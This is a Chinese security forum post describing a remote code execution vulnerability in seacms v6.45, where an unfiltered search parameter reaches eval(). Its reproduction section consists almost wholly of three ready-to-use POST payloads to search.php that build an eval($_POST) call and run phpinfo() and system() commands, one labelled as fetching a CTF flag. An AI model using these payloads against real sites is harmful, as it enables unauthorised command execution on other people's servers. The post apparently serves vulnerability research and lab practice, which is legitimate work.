安全矩阵

 找回密码
 立即注册
搜索
查看: 2413|回复: 0

seacms v6.45 任意代码执行漏洞

[复制链接]

114

主题

158

帖子

640

积分

高级会员

Rank: 4

积分
640
发表于 2020-8-12 09:47:49 | 显示全部楼层 |阅读模式
seacms v6.45 任意代码执行漏洞


1. 漏洞描述
seacms v6.45 中有个可控的变量没有经过过滤,就被带入了 eval() 中,导致了代码执行。

二、漏洞复现
使用 hackbar 插件进行漏洞复现

1. 代码执行
http://xxxxxxxx/search.php
post数据:
searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&ver=OST[9]))&9[]=ph&9[]=pinfo();



2. 命令执行
searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&ver=OST[9]))&9[]=system&9[]=('dir');


3. 获取Flag
searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&ver=OST[9]))&9[]=system&9[]=('ls /tmp');










回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-4-19 16:34 , Processed in 0.014543 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表